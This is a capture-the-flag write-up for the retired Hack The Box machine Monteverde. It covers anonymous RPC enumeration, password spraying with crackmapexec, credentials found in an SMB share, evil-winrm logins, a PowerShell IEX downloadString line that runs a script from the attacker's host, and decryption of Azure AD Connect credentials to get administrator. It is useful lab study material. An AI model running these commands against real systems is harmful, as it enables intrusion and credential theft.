Now since the machine has retired it’s time to go through the process to solve it. This was considerably easy machine if you are familiar with windows.
Nmap scan revealed the following
So we see we have active directory in this machine. Both the ports report to LDAP. Info : — — — — — — — -
- DOMAIN : MEGABANK.LOCAL0
- HOST: MONTEVERDE
I was not satisfied with this so did a fullport NMAP scan… A good habbit!!!
Connecting via rpcclient works using anonymous login. Rpcclient -U ‘’ 10.10.10.172 -N
Let us save the users and group names to a list users.txt for password cracking attack.Also added Dimitry, Sally , Ray etc for better username list
#Smbclient -U ‘’ -L ////10.10.10.172// — — Anonymous login accepted. — — No workgroup’s available
AS_REP — — not possible , Has no “ Don’t_require_preauth” — — thus AS_REP roasting not possible
- Tried hydra but ended with invalid response
- Crackmapexec for winrm (5985 port)
root@kali:~/Downloads/htb/Monteverde#crackmapexec winrm 10.10.10.172 -u ~/Downloads/htb/Monteverde/users.txt -p /pass1.txt
This did not work so I tried for the SMB .
root@kali:~/Downloads/htb/Monteverde# crackmapexec smb 10.10.10.172 -u ~/Downloads/htb/Monteverde/users.txt -p pass1.txt
Let’s go back to SMB enumeration and login with credentials
SMB Enumeration with credentials
Username : SABatchJobs Password : SABatchJobs
Found users$ share and it contained some interesting info in azure.xml
Active directory credentials — -
Let’s try for kerberoasting and winrm login exploitation.Username : mhope Password : 4n0therD4y@n0th3r$
EVIL-WinRM — -Windows Remote Management Login
So I tried to first cross check with CrackMapExec to see if winrm is accessible using these credentials.
Great !! Shows pwn3d!. Let’s try to login with evil-winrm
Finally Got USER !!!!!!
First things first — — Tried Windows-exploit-suggester.py , but seems python was not installed on the machine. So went for JAWS enumeration script.
*Evil-WinRM* PS C:\Users\mhope\Desktop> IEX(new-object net.webclient).downloadString(‘http://10.10.14.75:8000/jaws-enum.ps1')
So you see here we share Azure Admin group with AAD_98********* user and ADMINISTRATOR. And the only service running of some interest was AZURE
- Azure AD Connect Exploit
Ok so we have three options
I got a precompiled version here. https://github.com/VbScrub/AdSyncDecrypt/releases. So I transferred AdDecrypt.exe and mcrypt.dll to my writable directory on target machine which was C:/Users/mhope/Desktop. And went to below location and ran command.
C:\Program Files\Microsoft Azure AD Sync\bin
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\bin> C:\Users\mhope\Desktop\AdDecrypt.exe
There was an error in finding localDB.So I tried running with FullSQL Flag. You can see the difference here, why I used FullSQL flag.
Username: administrator Password: d0m@in4dminyeah
Now let’s do windows Remote managament <Evil-winrm> connection using these creds.
EUREKA !!!! We got the root.